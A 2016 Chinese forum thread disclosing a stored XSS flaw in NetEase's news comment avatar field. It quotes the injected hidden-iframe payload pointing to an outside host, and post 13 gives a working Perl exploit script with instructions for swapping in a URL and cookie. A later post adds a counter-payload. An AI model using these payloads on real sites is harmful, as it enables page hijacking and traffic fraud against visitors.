这是一个创建于 3406 天前的主题,其中的信息可能已经有所发展或是发生改变。
刚才访问: http://sports.163.com/16/0618/11/BPRCO3DM00051CA1.html#p=BMVOG5U20AI90005
会自动跳转到: http://52track.com:94/ (美国地址)
现在不跳转了,但还是会调入: http://chatp.jordan2u.com/23/test.php 这个 url 。(美国地址)
开始有些奇怪,后来查了一下代码,发现问题在这个 url : http://sdk.comment.163.com/api/v1/products/a2869674571f77b5a0867c3d71db5856/threads/BPRCO3DM00051CA1/comments/hotList?offset=0&limit=3&showLevelThreshold=70&headLimit=1&tailLimit=2&ibc=jssdk&callback=tool1009691620930263987_1466248158686&_=1466248158687
该 url 的内容:
tool1009691620930263987_1466248158686( {"commentIds":["2418735840","2418735840,2418825858","2418910814"],"comments":{"2418735840":{"against":11,"anonymous":false,"buildLevel":1,"commentId":2418735840,"content":"葛格利亚才是贤母的典范!","createTime":"2016-06-18 11:59:06","favCount":0,"ip":"115.193..","isDel":false,"postId":"BPRCO3DM00051CA1_2418735840","productKey":"a2869674571f77b5a0867c3d71db5856","shareCount":0,"siteName":"网易","source":"ph","unionState":false,"user":{"avatar":"http://imgm.ph.126.net/_sStRF4UCYz2gI5hzRrXpg==/6630565288886574327.jpg","id":"NTU5ZjYwMGVjMmQxYjQyNDY1MjhiZGU5OTBlYWQwYjdAdGVuY2VudC4xNjMuY29t","label":"[{"endTime":"1447629212974","startTime":"1447542812973","tagKey":"100"},{"endTime":"1441987817968","startTime":"1441901417967","tagKey":"101"},{"endTime":"1446868704041","startTime":"1446782304040","tagKey":"102"},{"endTime":"1442202823801","startTime":"1442116423800","tagKey":"103"},{"endTime":"1442095939822","startTime":"1442009539822","tagKey":"104"},{"endTime":"1447616152210","startTime":"1447529752210","tagKey":"105"}]","location":"浙江省杭州市","nickname":"詹跑跑","userId":63025043,"vipInfo":"vipt"},"vote":1050},"2418825858":{"against":15,"anonymous":false,"buildLevel":2,"commentId":2418825858,"content":"看到满屏黑狗真来火了,来做个统计詹姆斯爷们篮球,库里娘炮篮球!本人 02 詹迷 168 身高 88kg 吹牛被雷劈!","createTime":"2016-06-18 12:04:28","favCount":0,"ip":"120.42..","isDel":false,"postId":"BPRCO3DM00051CA1_2418825858","productKey":"a2869674571f77b5a0867c3d71db5856","shareCount":0,"siteName":"网易","source":"ph","unionState":false,"user":{"avatar":"http://img5.cache.netease.com/tie/images/noface80_80.png""><iframe src="<a href=" http:="" <a="" href="http://chatp.jordan2u.com" rel="nofollow">chatp.jordan2u.com="" 23="" test.php"="" rel="nofollow">http://chatp.jordan2u.com/23/test.php" style="display:none"></iframe>.","isDel":false,"postId":"BPRCO3DM00051CA1_2418910814","productKey":"a2869674571f77b5a0867c3d71db5856","shareCount":0,"siteName":"网易","source":"ph","unionState":false,"user":{"avatar":"http://mimg.126.net/p/butter/1008031648/img/face_big.gif","id":"Y2NibG5sd0AxNjMuY29t","location":"辽宁省沈阳市","nickname":"红黑色的梦想","userId":543741},"vote":739}}});
看 url 应该是评论系统,被插入了一条恶意评论,导致 json 解析错误。然后插入了一个 iframe 。
网易抓紧自查一下吧,现在 人家还在继续实验呢!
 | 1 alexecn OP 貌似这一会更坏了, 正在随意的添加 url , 刷流量呢。 主要添加了: https://www.chiphell.com/ 下面大量的 url 地址。 先大量的添加 url ,让客户访问。然后再一一删除,掩盖痕迹。 |
| 2 alexecn OP 继续的分析了一下。看上面的 json 代码,应该是 avatar 字段的问题,也就是上传用户头像的部分,用户指定上传的 url 地址没有做检查,所以恶意用户上传了一段: http://img5.cache.netease.com/tie/images/noface80_80.png""><iframe src="<a href=" http:="" <a="" href="http://chatp.jordan2u.com" rel="nofollow noopener">chatp.jordan2u.com="" 23="" test.php"="" rel="nofollow noopener">http://chatp.jordan2u.com/23/test.php" style="display:none"></iframe>. 作为他的头像地址。 而网易这个评论系统在显示的时候,对这段从数据库里提取的代码也没有做检查,导致了这个漏洞的生效。 |
 | 3 7654 2016-06-18 20:22:56 +08:00 chiphell 已挂 |
 | 4 hcwhan 2016-06-18 20:24:45 +08:00 via Android 确实 |
 | 5 indust 2016-06-18 20:31:16 +08:00 好简单的一个 XSS.. |
| 6 alexecn OP 继续挖一下, 这个评论是一个叫小红军的人发的 http://tie.163.com/reply/myaction.jsp?action=reply&username=a2ptc25rQDE2My5jb20= 注册时间在 2016.02.13 看来可能利用这个漏洞已经非常长的时间了。但手法并不太高明。 没有实验好的东西不要放,特别是导致整个页面的跳转,这样非常容易被人发觉。 如果没有整个页面跳转,我是不会去观察这个问题的。 这里没有网易的人吗? 有的话,抓紧补了吧! 否则这个漏洞很好用哦 |
 | 7 leega0 2016-06-18 20:37:59 +08:00 via iPhone 直接点,去乌云,那里应该有网易的安全负责人 |
| 8 alexecn OP 不去那里报告了,没有注册过。 只是看网易的 nba 新闻比较烦,网页刷的有点慢,才在这里吐吐槽而已。 看来不是一个账户用这个漏洞,还有这个: http://tie.163.com/reply/myaction.jsp?action=reply&username=a2ptc25rQDE2My5jb20=&f=gentienickname 他们自己顶评论,从而让这个代码可以升到新闻专题页上,现在专门发 James 的新闻评论,讨厌啊! NBA 好不容易看的心潮澎湃,还得帮网易抓 BUG...... |
 | 9 jookr 2016-06-18 21:42:17 +08:00 去乌云发漏洞得邀请码能卖几百块呢 可惜啊 |
| 10 alexecn OP 懒得做了,有看到这个的去那里发了吧。 我没意见。:0-) 我过一会把漏洞入口也发上来。 |
 | 11 wico77 2016-06-18 21:56:02 +08:00 用户图片怎么能上传带 iframe 的 url 呀。我测试上传不了呀 |
 | 12 maxsec 2016-06-18 23:35:27 +08:00 XSS 漏洞 |
| 13 alexecn OP 还有人等着看吗??刚才出去吃了个肉串喝了点酒。看来网易反应比较慢,都放出来,让他们好好自查吧! 漏洞入口,就在上传头像的地方。: http://tie.163.com/setting/avatar/ 原理:搞球啊!上传了头像文件之后,服务器返回了一个头像文件的地址,然后这个地址竟然要客户的浏览器再去提交到内部的 API 。 要我是你们项目经理,就骂死你们!内部的 Http API 不是这么用的! 代码: use strict; our $VERSION=0.1; use Data::Dumper; use AnyEvent; use JSON::XS; use AnyEvent::HTTP; my $cvar = AnyEvent->condvar; my $url='http://comment.api.163.com/api/v1/products/a2869674571f77b5a0867c3d71db5856/users?&ibc=newspc'; my $ss=qq|http://img5.cache.netease.com/tie/images/noface80_80.png "><iframe src="http://xx.xxxx.com/xxx.php" style="display:none"></iframe>.|; warn encode_json({avatar=>$ss}); http_request PUT => $url, headers => { "user-agent" => "OPener 1.0",'Content-Type'=>'application/json', "Cookie"=>''}, body=> encode_json({avatar=>$ss}), timeout => 30, sub { my ($body, $hdr) = @_; warn $body; return 1; }; $cvar->recv; $url 自己修改一下,还有 Cookie 自己改一下,就可以上传了。 网易抓紧吧! |
 | 14 LancerComet 2016-06-19 01:25:00 +08:00 确实存在,已经传一个酷炫标题上去了 |
 | 15 kn007 2016-06-19 07:21:53 +08:00 忘记哪个是猪场的,要不就能 at 了。。。 |
| 16 alexecn OP 请不要再发邮件询问这个漏洞的具体使用! 我一概不会回答。 还有告诫那些破坏者,不要太过肆无忌惮的使用这些东西。一个好好的页面你插入上百条地址让人去访问,太过分些了。 特别还是 NBA 的新闻,别坏了中子这两天看 NBA 的兴致~! |
| 17 maxsec 2016-06-19 14:14:40 +08:00 楼主,给你个思路,既然你发现这个漏洞了,何为直接以毒攻毒,让攻击者的代码失效呢? 比如: { list: [ lz: { message: "<noscript><textarea>" }, attacker: { message: "<img Onload='alert(/fuck_ding3shi/)'>" } ] } |
 | 19 ladyv2 2016-06-20 13:54:43 +08:00 目测 http://chatp.jordan2u.com/23/test.php 已经删掉了 昨天看了下,这个玩意叫什么网易发帖器,还留了个 qq 号码。 |
 | 20 tianchaodiaoming 2017-01-03 12:39:12 +08:00 大神,能留给联系方式交流下不? |
Select Language
